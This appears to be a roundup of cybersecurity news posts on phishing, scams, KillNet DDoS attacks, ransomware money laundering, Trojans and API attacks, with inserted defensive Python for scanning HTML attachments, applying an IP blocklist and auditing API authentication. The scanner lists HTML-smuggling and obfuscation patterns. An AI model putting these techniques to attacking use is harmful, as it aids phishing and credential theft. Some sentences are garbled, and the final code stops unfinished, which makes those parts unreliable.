
Delhi Police Alerts Citizens to New Cyber Scam


Authorities in Delhi are cautioning residents to remain vigilant against a recent surge in cyber fraud cases known as ‘digital house arrest,’ with over 200 incidents reported monthly in the capital.

Senior officials describe the tactic as a serious threat: once victims are ensnared in the scheme, the cybercriminals coerce them into parting with their money.

In this scheme, scammers posing as law enforcement officers deceive victims into believing their bank accounts, SIM cards, Aadhaar cards, or other linked documents have been compromised. The victims are then virtually confined to their homes and pressured into paying the scammers.

According to a senior officer from the Intelligence Fusion and Strategic Operations (IFSO) unit of the Delhi Police, cases involving amounts exceeding Rs 50 lakh are investigated by their specialized team.

In a recent case, a man preparing for work received a call from someone claiming to be from the Mumbai Crime Branch. The caller accused the victim of involvement in drug trafficking using his Aadhaar card and instructed him not to leave his house during a prolonged interrogation session. The victim, fearing repercussions, complied. Eventually, the scammers gained remote access to his computer, drained his bank account, and vanished.

These fraudsters often employ forged police letterheads and use translation tools to enhance their communication. They specifically target vulnerable individuals, such as the elderly. Victims are urged to immediately report such incidents to the police helpline for assistance.

According to the National Crime Records Bureau (NCRB), cybercrime cases in Delhi nearly doubled in 2022, with reported incidents increasing from 345 to 685. This marks a significant rise from the 166 cases reported in 2020.

Cybercriminals Target Facebook Users with Malicious 'Look Who Died' Messages

'Look Who Died' Facebook Scam

In recent times, Facebook scams and fraud have been on the rise, with scammers finding new ways to exploit the platform for their malicious activities. The latest attention-grabbing scam to hit Facebook is the "Look who died" scam, which targets users seeking information about the death of a friend or celebrity. This article will delve into the details of the scam and provide expert advice on how to protect yourself from falling victim.

The 'Look Who Died' Scam: A Threat to Personal Data Security

The 'Look who died' scam operates by sending Facebook users messages with enticing subject lines like "Look who died." Curiosity prompts users to click on the link, expecting to find news or information about the mentioned death. Instead of being redirected to a legitimate news article, however, users unknowingly download malware onto their computers or devices.

The Exploitative Tactics of Scammers on Facebook

As more people join Facebook and engage with its features, scammers are finding new ways to deceive and defraud users. Carey van Vlaanderen, a digital security expert and CEO of ESET Southern Africa, highlights the use of impersonation, fake promotions, and malware spread as some of the tactics scammers employ. Unfortunately, falling victim to these scams can result in financial loss and identity theft.

Identifying and Protecting Yourself from Facebook Scams

Van Vlaanderen emphasizes the need for caution and vigilance when using Facebook. She advises users to be wary of unusual requests or sensitive information being asked for, as these could be warning signs of a potential scam. To verify the authenticity of a message from a Facebook friend, Van Vlaanderen suggests checking for any sudden profile changes or strange posts that may indicate a compromised account.

The Wider Impact of Cybercrime and the Need for Protection

The rise in cybercrime is not limited to Facebook scams but extends to various forms of online attacks. According to experts from the Council for Scientific and Industrial Research (CSIR), cyber-attacks cost the country billions of rands annually. The digitalization era has seen an increase in cybercrime, posing risks to government institutions, large corporations, and small and medium-sized businesses. Financial and data loss, identity theft, and cyber extortion are significant concerns for individuals and organizations alike.

Urgent Action Required: Protecting Against Cybersecurity Breaches

Recent cybersecurity breaches, such as the one that affected the provincial legislature, highlight the urgency of addressing cyber threats. The lack of transparency surrounding such attacks and their implications raises concerns about preparedness and response strategies. ANC chief whip Pat Lekker has called for a debate on the cyberattack, emphasizing the need for open dialogue and effective measures to combat cybercrime.

Shifting Privacy Paradigm and Building Trust

Erhard Brand, a research and development lead at IT authentication company Entersekt, points out that digital privacy concerns are changing how companies handle personal and biometric data. Empowering individuals with control over their privacy fosters an environment of trust. As technology advances, it becomes crucial for companies to prioritize data security and privacy protection.

The 'Look who died' scam on Facebook serves as a reminder of the ever-present threat of online scams and fraud. To protect yourself from falling victim to such scams, exercise caution, be vigilant for warning signs, and adopt best practices for online security. As the cybercrime landscape evolves, individuals, businesses, and governments must work together to combat cyber threats, ensuring a safer digital environment for all.

Emails With HTML Attachments are Still Popular Among Phishing Scammers



Cybercriminals are increasingly using malicious HTML files to attack computers, according to a recent study by security researchers at Barracuda Networks. The study also revealed that malicious files now account for over half of all HTML attachments sent via email, a significant increase compared to last year.

How does a phishing scam using HTML attachments work? Instead of placing a link in the email body, the attackers send an HTML attachment which, once opened, contacts their command-and-control (C&C) servers to download crypto-malware, Trojan horses, or other nasty payloads.

Phishing scams based on HTML attachments have been around for a long time, but people are still unaware of them and increasingly fall for them.

There is a high chance that you checked your email more than once this past weekend, even though it was a holiday weekend for many people.

HTML files continued to be one of the most common attachments used in phishing scams in 2022, which shows that the method is still one of the most effective ways of getting past spam detection software and reaching the intended targets.

HTML (HyperText Markup Language) is the standard markup language for documents designed to be displayed in a web browser, according to Wikibooks. It can be assisted by technologies such as Cascading Style Sheets (CSS) and scripting languages such as JavaScript.

Web browsers receive HTML documents from a web server or from local storage and render them into multimedia web pages. An HTML document describes the structure and semantics of a web page, including cues that indicate how it should appear to the end user, as well as its content.

When victims open the HTML files attached to phishing emails, they are frequently directed to malicious websites, file downloads, or phishing forms that are rendered locally in the browser on their own computer.

Email security software commonly lets such attachments through when delivering messages, since HTML itself is not regarded as a threat to recipients; as a result, the messages land successfully in the target's inbox.

One interesting aspect of this recent increase in malicious HTML files is that it does not appear to be the result of mass campaigns in which hackers send the same attachment to many victims.

To protect against these attacks, it is now more imperative than ever to implement appropriate cybersecurity measures; the report gives an example of how they can be prevented.

The cybercriminal groups DEV-0238 and DEV-0253 have reportedly used HTML smuggling to deliver keyloggers through HTML attachments, and the technique has also been associated with DEV-0193 delivering Trickbot malware.

HTML attachments are used in phishing attacks 


Phishing pages delivered as HTML attachments are the most common type. There is generally no malicious code within the HTML file itself that launches arbitrary code on the system, so the file looks benign; despite this, such attachments should be treated with caution. By mimicking the sign-in page of a service such as Microsoft, Google, or a major online bank, the attachment can lead the user to enter their credentials into the form and submit them to a malicious website, resulting in an account takeover.

Hackers use several tactics to implement the phishing forms and redirections in HTML attachments, ranging from simple redirects to obfuscated JavaScript that disguises a phishing form built to steal personal information.

A secure email gateway and antivirus solution can inspect email attachments for malicious URLs, scripts, or other content that could threaten users' security.

The majority of these attacks consist of malicious phishing forms or redirects built with JavaScript inside the HTML attachment, which is done to avoid detection.
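As an added illustration (not code from the Barracuda report or this post), the following Python script triages an HTML attachment for the traits just described: a sign-in form posting to a foreign host, meta-refresh or JavaScript redirects, and obfuscated JavaScript such as base64 decoding feeding document.write or Blob-based downloads. The sample attachments and the `example.invalid` host are constructed.

```python
"""Heuristic triage of an HTML email attachment (added example, not from the report).

Flags the traits described above: a credential form that posts off-site,
meta-refresh or JavaScript redirects, and obfuscated JavaScript (base64
decoding, dynamic document.write, Blob-based "HTML smuggling" downloads).
The sample attachments are constructed; example.invalid is a reserved name.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# JavaScript techniques the text mentions, as regular expressions.
JS_INDICATORS = {
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
    "dynamic_write": re.compile(r"document\.write(?:ln)?\s*\(|\binnerHTML\s*=", re.I),
    "string_unescape": re.compile(r"\b(?:unescape|decodeURIComponent|String\.fromCharCode)\s*\(", re.I),
    "js_redirect": re.compile(r"(?:window\.)?location(?:\.href)?\s*=[^=]|location\.replace\s*\(", re.I),
    "blob_download": re.compile(r"new\s+Blob\s*\(|createObjectURL\s*\(|msSaveOrOpenBlob", re.I),
}


class AttachmentParser(HTMLParser):
    """Collects scripts, inline event handlers, forms and meta-refresh tags."""

    def __init__(self):
        super().__init__()
        self.scripts, self.handlers, self.forms = [], [], []
        self.meta_refresh = False
        self._in_script = False
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            self.scripts.append("")
        elif tag == "form":
            self._form = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["password"] = True
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh = True
        # onload=, onerror= and similar attributes carry script as well
        self.handlers.extend(v for k, v in a.items() if k.startswith("on") and v)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        elif tag == "form":
            self._form = None

    def handle_data(self, data):
        if self._in_script and self.scripts:
            self.scripts[-1] += data


def scan_html_attachment(html, sender_domain):
    """Return {'findings': [...], 'verdict': 'allow' | 'review' | 'block'}."""
    p = AttachmentParser()
    p.feed(html)
    p.close()
    js = "\n".join(p.scripts + p.handlers)
    findings = {name for name, rx in JS_INDICATORS.items() if rx.search(js)}
    # A long base64-looking literal is the usual carrier for a smuggled payload.
    if re.search(r"['\"][A-Za-z0-9+/=]{200,}['\"]", js):
        findings.add("long_encoded_literal")
    for form in p.forms:
        if form["password"]:
            findings.add("credential_form")
            host = urlparse(form["action"]).hostname or ""
            # the "fake sign-in page" case: a login form posting to a foreign host
            if host and not host.endswith(sender_domain):
                findings.add("offsite_form_post")
    if p.meta_refresh:
        findings.add("meta_refresh_redirect")
    if ("offsite_form_post" in findings or "blob_download" in findings
            or {"base64_decode", "dynamic_write"} <= findings):
        verdict = "block"
    elif findings:
        verdict = "review"
    else:
        verdict = "allow"
    return {"findings": sorted(findings), "verdict": verdict}


# Constructed samples, not real phishing kits.
SAMPLE_PHISH = """<html><body>
<form action="https://login.example.invalid/collect" method="post">
  <input name="user"><input type="password" name="pass"><button>Sign in</button>
</form>
<script>document.write(atob("PGgxPkludm9pY2U8L2gxPg=="));</script>
</body></html>"""
SAMPLE_BENIGN = """<html><body><h1>Invoice #1234</h1>
<p>Your statement is attached. Contact billing@example.com with questions.</p>
</body></html>"""
```

Calling `scan_html_attachment(SAMPLE_PHISH, "example.com")` yields a "block" verdict, while the plain invoice is allowed; the heuristics are a triage aid for a gateway, not a substitute for detonating the attachment in a sandbox.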

Since malicious files can damage your device and your organization, it is increasingly important to take the necessary precautions. The following measures help prevent such attempts:

Your email infrastructure is crucial here. Antivirus software and firewalls should be updated regularly to function properly, and a solid data loss prevention plan must be in place. DMARC should be configured for your domain as the most effective way to secure your email communications.

Two-factor authentication is necessary, followed by zero-trust access based on multi-factor authentication. Such controls evaluate a user's credentials, device, location, time zone, and access history, so employees remain protected and breaches are contained even if they fall victim to hacker attacks, credential theft, or phishing.

The importance of training employees to recognize and report malicious HTML attachments must be recognised. Employees must be trained to recognize and report attachments from unknown sources, especially those containing malware. Cybersecurity threats can have serious consequences for a business if they are not prevented.

Obfuscation is certainly one of the common denominators among the spammed HTML attachments seen here, and having to deal with such a threat at the email gateway layer demonstrates just how difficult it is to detect.

Cryptocurrency Exchanges Linked to Ransomware



Nine cryptocurrency exchange websites have been taken down by the FBI and the Ukrainian police in a daring joint operation. Cybercriminals and ransomware gangs used these websites to launder money, since the sites facilitated money laundering by criminals operating online. Ukrainian prosecutors' offices and the Virtual Currency Response Team were also involved in the operation.

The United States Department of Justice announced that, in a collaboration between the FBI's Detroit Field Office and Ukrainian police, the FBI seized several virtual currency exchange services on Monday. These services may have been used by cybercriminals to launder money obtained through ransomware attacks and to conduct anonymous transactions.

A press release states that in the 'crypto exchanges' operation the FBI also received support from the Virtual Currency Response Team (VCRT), the National Police of Ukraine, and regional prosecutors. The nine seized websites were:

  1. 24xbtc.com
  2. 100btc.pro
  3. pridechange.com
  4. 101crypta.com
  5. uxbtc.com
  6. trust-exchange.org
  7. bitcoin24.exchange
  8. paybtc.pro
  9. owl.gold

These websites allowed users to anonymously buy Bitcoin, Ether, and other cryptocurrencies. They offered exchange services in Russian and English with few Know Your Customer (KYC) or Anti-Money Laundering (AML) restrictions, and were also advertised on online forums dedicated to criminal activity.

The exchange servers have been shut down and their domain names taken over by US authorities. The exchanges were accused of offering anonymous cryptocurrency exchange services to site visitors, who included cybercriminals, scammers, and many other bad actors.

The FBI has accused these crypto exchanges of being used by cyber criminals, including scammers, ransomware operators, and hackers, for laundering money. The FBI also stated that the exchanges were unlicensed, which under US law makes their operation a support for criminal activity.

Two servers were confiscated, located in different parts of the world including the US, Ukraine, and several European countries. Cybercriminals used the exchanges to launder money from illegal activities, and the authorities are now using the seized infrastructure to identify and track down those hackers.

Both the English- and Russian-language exchanges offering these services were censured by the FBI for their lack of anti-money laundering measures and for collecting little or no Know Your Customer information. The FBI says such unlicensed, rogue exchanges are among the most critical hubs of the cybercrime ecosystem.

On the seized websites, users could anonymously convert their cryptocurrency into coins that are more difficult to trace, allowing hackers to disguise the source of stolen money and avoid detection by law enforcement agencies.

The sites offered a range of services, including live help and instructions in both Russian and English, and served a wide range of cybercrime communities.

The FBI's announcement states that noncompliant virtual currency exchanges operating in violation of United States Code, Sections 1960 and 1956, act as hubs for cybercrime: they have lax anti-money laundering programs and collect little information about their customers, which makes them significant cybercrime centers.

Early this month, a search was conducted at the home of former FTX executive Ryan Salame as part of the FBI's investigation into Salame's role as an advisor to Bankman-Fried at the time.

In summary, the FBI and Ukrainian police took down nine websites known as 'crypto exchanges' that were well known for laundering money for ransomware groups and cyber criminals. The daring, organized action was aimed at disrupting the digital infrastructure that allows cybercriminals to profit from their malicious actions.


New Cybersecurity Vulnerabilities are Being Discovered Using 'Intelligent Mining'


"Intelligent mining" operations have emerged as a gold mine for cybercriminals, with brute force attacks shutting down operations and forcing mines to pay a ransom.

Dr. Pierre Jacobs, the head of cybersecurity operations and compliance at CyberAntix, a member of the Sizwe Africa IT Group, holds this opinion. According to him, cyber security breaches have reached a point where this dishonest behaviour has been legalised, giving criminals the opportunity to commit cybercrimes in conditions very similar to those of legitimate organisations. Lone hackers are still around and may wish to stop production for fun or to see how far they can go.

“South African mining companies are no exception,” Jacobs stated. “The transition from traditional mining practices to intelligent mining is exposing the industry to a new frontier of cyber threats.” 

74% of internet businesses have suffered serious computer breaches, according to Fortinet research, and the problem was made worse by the Covid-19 outbreak. The mining and manufacturing industries in particular experienced a sharp rise in infiltration activity, with an 11% increase in network intrusions.

Attackers are focusing their efforts on Industrial Control Systems (ICS) in a variety of industries because these systems regulate a wide range of automated processes, including measuring devices, packaging equipment, and all the other assembly-line parts that are essential to any production process. Attackers are aware that by focusing on these systems, they might negatively impact business operations. 

Although ICS devices are frequently specific to industries and used for specialised systems or activities, they are normally less well-known than enterprise information technology (IT) devices like laptops, desktops, and smartphones. In this sector, cybercriminal activity is becoming more organised and specialised. 

The bulk of cyberattacks on mining businesses aim to disrupt corporate operations and threaten supply chains by stealing intellectual property and other important data, such as geotechnical studies and production plans. According to Jacobs, the Internet of Things (IoT) is a threat to mines with any amount of automation. In all sectors, criminals frequently use email platforms as their first method of entry.

Any of these devices—desktops, laptops, smartphones, even the workplace printer—can serve as entry points for hackers. Mining operations in South Africa are also affected by rising geopolitical dangers and intermittent conflicts between other nations, especially Western nations and China. Mines throughout the world compete with South African exporters, and competitors worldwide would benefit from any disruption to our supply systems.

Cybersecurity breaches are caused by a number of factors, including a lack of understanding of the Industrial Internet of Things (IIoT) and the Internet of Things (IoT), supply chain weaknesses, lax security procedures used both internally and by outside contractors, identity theft, and insufficient incident response. 

"Strategies to mitigate risk should seek to identify and understand the business models and motivation of the cyber criminals. Businesses also need to understand the risks and vulnerabilities of their industry and anticipate threats," Jacobs concluded. "People, processes, and technologies all pose risks, and to address cyber security threats, it’s important to take a three-pronged approach to security – one that focuses on people, processes, and technologies. The challenge is to secure the enterprise by locking all the information entrance gates to bridge any gaps in the system. Identify critical business systems and then identify risks against those systems. Secure protocols need to be in place wherever there is a connection to the Internet. Real-time monitoring and investigation are vital." 

Block KillNet's DDoS Bots Using These Proxy IP Addresses



The US government has warned that the Russian cybercrime gang KillNet is stepping up its attacks against hospitals and health clinics by flooding their networks, and as part of its warning has pointed to a free tool designed to help organizations defend against KillNet distributed-denial-of-service (DDoS) bots.

The KillNet open proxy IP blocklist currently lists tens of thousands of proxy IP addresses that Russian hackers are using in their attempts to flood networks with traffic. SecurityScorecard's threat researchers built the list following their investigation of KillNet and other network-flooding miscreants.
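As an added example (not part of the original post or of SecurityScorecard's tooling), this Python snippet shows how a defender puts an open proxy blocklist of this kind to work: parsing it, matching web-server log sources against it to measure how much traffic the listed proxies account for, and rendering it as an nftables set. The blocklist entries and log lines are constructed from documentation address ranges, not real proxies.

```python
"""Apply an open-proxy IP blocklist to access logs and a firewall (added example).

The blocklist and log lines below are constructed; 203.0.113.0/24,
198.51.100.0/24, 192.0.2.0/24 and 2001:db8::/32 are documentation ranges.
"""
import ipaddress
import re

# One entry per line: single addresses or CIDR ranges, '#' comments, blanks.
SAMPLE_BLOCKLIST = """
# constructed sample, not the real KillNet list
203.0.113.7
198.51.100.0/24
2001:db8:dead::/48
not-an-ip
"""

# Constructed nginx/Apache "combined"-style access log lines.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [01/Feb/2023:10:00:01 +0000] "GET /appointments HTTP/1.1" 200 512
198.51.100.42 - - [01/Feb/2023:10:00:01 +0000] "GET /appointments HTTP/1.1" 200 512
192.0.2.10 - - [01/Feb/2023:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024
198.51.100.43 - - [01/Feb/2023:10:00:02 +0000] "GET /appointments HTTP/1.1" 200 512
2001:db8:dead:beef::1 - - [01/Feb/2023:10:00:03 +0000] "POST /login HTTP/1.1" 403 0
"""

LOG_SOURCE = re.compile(r"^(\S+) ")


def load_blocklist(text):
    """Parse addresses and CIDRs into ip_network objects, skipping junk lines."""
    nets = []
    for raw in text.splitlines():
        entry = raw.split("#", 1)[0].strip()
        if not entry:
            continue
        try:
            nets.append(ipaddress.ip_network(entry, strict=False))
        except ValueError:
            continue  # malformed entry: skip it rather than abort the whole load
    return nets


def is_blocked(ip_str, nets):
    """True when ip_str falls inside any listed network (v4/v6 never cross-match)."""
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return False
    return any(ip in n for n in nets)


def summarize_log(log_text, nets):
    """Return (blocked_hits, total_hits, {source: hits}) for listed sources."""
    blocked, total = {}, 0
    for line in log_text.splitlines():
        m = LOG_SOURCE.match(line)
        if not m:
            continue
        total += 1
        src = m.group(1)
        if is_blocked(src, nets):
            blocked[src] = blocked.get(src, 0) + 1
    return sum(blocked.values()), total, blocked


def to_nft_set(nets, family="inet", table="filter"):
    """Render nftables interval sets (one per address family) for `nft -f`.

    Interval sets are required because the list mixes hosts and CIDR ranges;
    a drop rule can then reference @ddos_proxies_v4 / @ddos_proxies_v6.
    """
    out = [f"table {family} {table} {{"]
    for ver, typ in ((4, "ipv4_addr"), (6, "ipv6_addr")):
        elems = ", ".join(str(n) for n in nets if n.version == ver)
        if elems:
            out += [f"    set ddos_proxies_v{ver} {{", f"        type {typ}",
                    "        flags interval", f"        elements = {{ {elems} }}", "    }"]
    out.append("}")
    return "\n".join(out)
```

Running `summarize_log(SAMPLE_ACCESS_LOG, load_blocklist(SAMPLE_BLOCKLIST))` attributes four of the five sample requests to listed proxies, which is the kind of before/after measurement worth taking before and after the set is loaded.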

Although DDoS attacks are relatively unsophisticated, they can still take a serious toll, especially when they disrupt hospitals, according to a recent blog post by the security firm that uses KillNet as an example.

Toward the end of January, the Russian gang took down a website belonging to one of 14 hospitals targeted in the United States, among them the University of Michigan Hospitals and Health Centers, Stanford Hospital, Duke University, and Cedars-Sinai Medical Center. DDoS attacks are used for several reasons, one of which is to mask more intrusive activity.

A report released by the US Department of Health and Human Services (HHS) on Wednesday confirmed that KillNet is a threat to the healthcare sector and prompted DHS to issue a second warning; the Department of Homeland Security has issued a similar security alert twice in the last few months.

It is common for pro-Kremlin supporters to attach an ideological bent to their attacks - sometimes using empty threats to convey their message. "Killmilk, one of the leading members of the KillNet group, has threatened the US Congress with the sale of the health and personal information of American citizens to attack US policies concerned with Ukraine," according to the December security alert from HHS. According to the US, the planned attack has not yet been carried out. 

In a similar vein, the gang threatened to attack ventilators and other technical devices in British hospitals if another alleged KillNet criminal, arrested in London in May, was not released.

Although KillNet may claim to have carried out attacks on the US military, it is wise to take its claims with a pinch of salt, according to HHS. Given the fact that the group tends to exaggerate, there is a possibility that some of these operational and development announcements may simply be meant to garner attention, both publicly and within the cybercrime underground. According to the FBI and private security researchers, the group's DDoS campaigns have been viewed as publicity stunts, which, as annoying as they have been, have had "limited success." 

A Public Relations Stunt That Could Turn Wrong   

KillNet claimed responsibility on October 10 for knocking more than a dozen websites associated with US airports offline. Although the large-scale DDoS attack was disruptive, it did not disrupt air travel or harm airport operations.

When someone claimed a day later to have unleashed a second bot army against JPMorgan Chase, the same criminals saw similarly feeble results. In my opinion, some PR agency is trying to increase their budget for PR.

Then, at the beginning of November, a US Treasury official announced that the department had halted a "pretty low-level" DDoS attack, also attributed to KillNet, designed to disrupt critical infrastructure nodes in the department.

KillNet's DDoS attacks usually do not cause major damage, but they can disrupt healthcare organizations and the millions of patients they serve for hours, days, or even weeks, which is especially damaging in the healthcare sector.

These bots reportedly flood the network traffic of patients and doctors, preventing them from sending and receiving health information online and making it harder for patients to schedule appointments.

Furthermore, sometimes miscreants use DDoS attacks as a distraction for their security teams to keep their attention while they work on more dangerous attacks, including the theft of sensitive information or the deployment of ransomware. 

According to HHS, pro-Russian ransomware groups, including former members of the defunct Conti group, are likely to respond to KillNet's appeal and offer support. This would most likely lead to KillNet targeting entities with DDoS attacks as a means of extortion, a tactic that several ransomware groups have employed.

Following a Surge in Metaverse Crimes, Interpol Promises to Implement Punishment


Real-world criminals are now attempting to conduct malicious practices in the virtual world, but this time they may well face repercussions. To ensure this, the International Criminal Police Organization (ICPO) is developing techniques to identify crimes in the Metaverse and to combat cyber-attacks and the criminals lurking in the digital world.

According to Secretary General Jurgen Stock, the objective of Interpol is to monitor criminal activities across the metaverse. The “sophisticated and professional” criminals are opting for advanced technological tools and tactics to commit crimes, which has to stop for the sake of online users. 

As the number of people using the metaverse rises, more crimes including data theft, money laundering, crimes against children, financial fraud, ransomware, phishing, etc. could occur. 

Stock believed it essential for Interpol to remain relevant and adopt new technologies as they are developed. He stressed the importance of Interpol's response to the problem, emphasizing how rapidly criminals are adopting new technologies for their illicit activities.

He also noted that the organization's authorities sometimes run short of the resources needed to do their jobs effectively. They have seen firsthand that if action is delayed, trust in the agency's resources, and consequently in the metaverse, may be tarnished. Such services are already available, and criminals are already using them.

What does Interpol Consider Crime in Metaverse? 

Interpol's virtual reality (VR) realm offers law enforcement a glimpse into the metaverse and a preview of the kinds of crimes that might be committed there through its secured servers. This further gives law enforcement personnel an opportunity to learn about the challenges of policing in the metaverse and test out potential solutions. 

However, Interpol's Executive Director of Technology and Innovation Madan Oberoi notes that the organization is having trouble defining what constitutes a crime in the metaverse and spreading awareness of such crimes. "There are crimes where I don't know whether it can still be called a crime or not. If you look at the definitions of these crimes in physical space, and you try to apply it in the metaverse, there is a difficulty," he says.

Moreover, the organization also asserts that one of its main tasks is informing the public about these issues. According to Oberoi, law enforcement agencies must make sure to educate themselves about the metaverse in order to effectively assist victims or potential victim users of crimes pertaining to the metaverse. 

To combat cybercrime efficiently, one of the best solutions Interpol can implement is to regulate criminal acts in the metaverse and encourage law enforcement agencies to keep up with the technology's rapid advancement. Interpol promises to be in full force in assisting criminal investigations and crime-solving, and it will cooperate with its 195 member nations to combat global cybercrime.

Linux Malware Records a New High in 2022


While more and more devices are adopting Linux as their operating system, its popularity has nonetheless attracted cyber-criminals: according to recent reports, the amount of malware aimed at Linux increased dramatically in 2022.

According to observations by Atlas VPN based on data from the threat intelligence platform AV-ATLAS, as many as 1.9 million Linux malware threats were observed in 2022, up 50% year-on-year.

The reports further claimed that most of the Linux malware samples were discovered in the first three months of the year. 

Secure Operating System

In Q1 2022, researchers identified 854,690 new strains. The number later dropped by 3% in Q2, detecting 833,065 new strains. 

The number of new detections fell 91% to 75,841 in the third quarter of the year, indicating that Linux malware developers may have taken their time off. The numbers increased once more in the fourth quarter of the year, rising by 117% to 164,697. 

Despite the researchers' observations, Linux remains one of the "highly secure operating systems."

“The open-source nature of Linux allows for constant review by the tech community, leading to fewer exploitable security vulnerabilities. Additionally, Linux limits administrative privileges for users and compared to more widely used operating systems like Windows, it still has less malware targeting it,” the researchers added. 

While threat actors will not stop chasing flaws in the world's fifth most popular operating system, businesses and consumers alike must remain on the lookout, the researchers concluded.

Although Linux is not as popular as Windows or macOS, it is still a widely used operating system. From Android devices (which are built on Linux) to Chromebooks, video cameras, and wearable devices, to all kinds of servers (web servers, database servers, email servers, etc.) there are more than 32 million endpoints operating on Linux.  

The 5 Most Common Types of Trojans You Should Know About


As we become more dependent on technology and entrust it with more of our personal information, cybercriminals devise more complicated and diverse methods of obtaining sensitive data. Among the many types of harmful malware are Trojan Horses, which themselves come in a variety of forms created for various purposes.

What are the most typical Trojan types that you should be on the lookout for? Let's quickly review what Trojan Horses are before we look at the various types of them.

The Odyssey, a work of Homer's from classical Greece, is where the phrase "Trojan Horse" first emerged. The city of Troy receives a large wooden horse as a gift, but the recipients have no idea that soldiers are concealed inside the animal. The soldiers can invade when the horse enters the city.

Similar to the original, a Trojan Horse program conceals itself inside otherwise harmless-looking software. For instance, you might believe that an app is safe to download and install, but the developer may have added a Trojan to the program. Once the program has infected your device, it can be used for a variety of illegal activities, including remote control, data theft, and activity monitoring.

Different Trojan Types:

It's crucial to be aware of the various Trojan Horse types so you can better protect yourself.

1. Downloader Trojans

Downloader Trojans require an internet connection to operate. When a device is infected, the Trojan does nothing until an internet connection is made, at which point it downloads more malicious software to aid the hacker in their attack. This type of Trojan can also launch malicious software on the infected device. They serve as a kind of opening salvo in the assault, giving the hacker a firm grip on the target.

2. Rootkit Trojan

Rootkits are software tools that provide remote administrative access, and unauthorized remote access is frequently the launchpad for a cyberattack. With the administrative access a rootkit Trojan provides, an attacker can perform a wide range of tasks on the infected device: run another malicious programme, steal confidential login information, or eavesdrop on private communications.

3. Fake Antivirus Trojans

False antivirus Trojans, as their name implies, pose as antivirus software. In this way, the victim will believe the programme is keeping them safe when the reality is completely the opposite. Even though the programme may try to trick you by imitating antivirus functions, its true objective is exploitation. By intimidating the user into purchasing additional security measures, such software defrauds them of their money.

4. Banking Trojans

Banking Trojans focus on banking data. Bank credentials are highly sought after in the cybercrime world because they can give attackers direct access to a victim's money, and they are frequently traded on the dark web, where criminal groups pay for stolen credentials. Banking Trojans frequently target the websites of financial institutions.

Once a banking Trojan is on the victim's device, the attacker can harvest the victim's banking credentials. Beyond login credentials, banking Trojans can also help the attacker get past two-factor authentication, a security measure many people use to protect their online bank accounts.

5. Game-Thief Trojans

Game-thief Trojans, also known as "gaming Trojans," break into gaming accounts and steal personal data. With millions of online gaming accounts in existence, cybercriminals have a ready market for stolen data. Once the Trojan gains access to valuable data, it sends that information to the attacker. For instance, a user's Steam account might be targeted to obtain payment data or steal virtual goods.

Trojan horses are so adaptable that they put internet users at risk in various ways, making it challenging to avoid them. But you can more effectively avoid Trojan Horses and protect yourself and your data by being aware of the risks and using extra caution when using your devices.

Financial Service API and Web Application Attacks are up by 257%

 



Security vendors and researchers publish reports on many ongoing issues, and every day new threats are added to the list, along with new tools in the security arsenal. Managing the attack surface (vulnerabilities, attack vectors, and so on) remains one of the biggest challenges organizations face. 

In today’s hybrid and multi-cloud environments, apps and APIs are targets that attackers can and will exploit. CDN provider Akamai Technologies, Inc. recently released new research showing 257% year-over-year growth in web application and API attacks against financial services institutions. 

The report indicates a growing risk to the financial services sector and a shift to more advanced and sophisticated cyberattacks. The report also revealed that DDoS attacks on financial services institutions have grown by 22%. 

Furthermore, the study shows that cybercriminals are using techniques in their phishing campaigns to bypass two-factor authentication solutions. 

As noted above, several institutions now track cybercrime data. Akamai's report, titled Enemy at the Gates, found that roughly 80 percent of attackers aim their efforts at customers of financial services, looking for the path of least resistance to monetary gain. 

“Companies have moved key infrastructure over to APIs, so the criminals are following the revenue. But on top of that, APIs are newer and, in many cases, don’t have the same level of maturity in security processes and controls, so are more vulnerable,” Steve Winterfeld, advisory CISO at Akamai said. 

Alongside the findings, the company recommended several steps enterprises can take to counter API-driven threats: 
  • Invest in technology that automatically discovers, validates and catalogs APIs, while developing a security strategy that incorporates API security testing and API access control. 
  • Increase transparency over what internal and third-party APIs are used for, so the enterprise is in a position to start mitigating potential threats across the attack surface. 
  • Prioritize updating phishing defenses with FIDO2-compliant capabilities to counter the latest MFA bypass attacks. 
“Finally, they are easier to automate attacks against as they are designed for automation. These factors combine to make APIs a smart place for attackers to focus. This is also why CISOs need to focus on them,” Winterfeld added.
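The first recommendation above, cataloguing APIs and checking their access control, can be started from the API specifications a team already has. The following added example (not Akamai's tooling) walks an OpenAPI 3 document, held here as an inline Python dict so no YAML library is needed, and lists every operation that is explicitly public (`security: []`), never covered by a security requirement, or references a scheme that is not defined. The sample specs and their paths are constructed for the demonstration.

```python
"""Find API operations that carry no authentication requirement.

Added example; not Akamai's tooling. It reads an OpenAPI 3 document (here
an inline Python dict, so no YAML dependency) and reports every operation
that is either explicitly public (`security: []`) or never covered by a
security requirement at all, plus references to undefined schemes.
"""

HTTP_METHODS = {"get", "post", "put", "patch", "delete", "head", "options", "trace"}


def unprotected_operations(spec):
    """Return (METHOD, path, reason) tuples for operations lacking auth.

    OpenAPI semantics: an operation without its own `security` inherits the
    document-level `security`; `security: []` on an operation overrides that
    to 'no auth'. Both gaps end up in an inventory like this.
    """
    default_sec = spec.get("security")
    defined = set(spec.get("components", {}).get("securitySchemes", {}))
    findings = []
    for path, item in spec.get("paths", {}).items():
        for method, op in item.items():
            if method.lower() not in HTTP_METHODS:
                continue  # skip path-level keys such as 'parameters' or 'summary'
            sec = op.get("security", default_sec)
            if sec == []:
                findings.append((method.upper(), path, "explicitly public"))
            elif not sec:
                findings.append((method.upper(), path, "no security requirement"))
            else:
                # each requirement object maps scheme name -> list of scopes
                for req in sec:
                    for scheme in req:
                        if scheme not in defined:
                            findings.append((method.upper(), path, f"undefined scheme {scheme}"))
    return findings


# Constructed sample: a bank-style API with a document-level bearer-token requirement.
SAMPLE_SPEC = {
    "openapi": "3.0.3",
    "security": [{"bearerAuth": []}],
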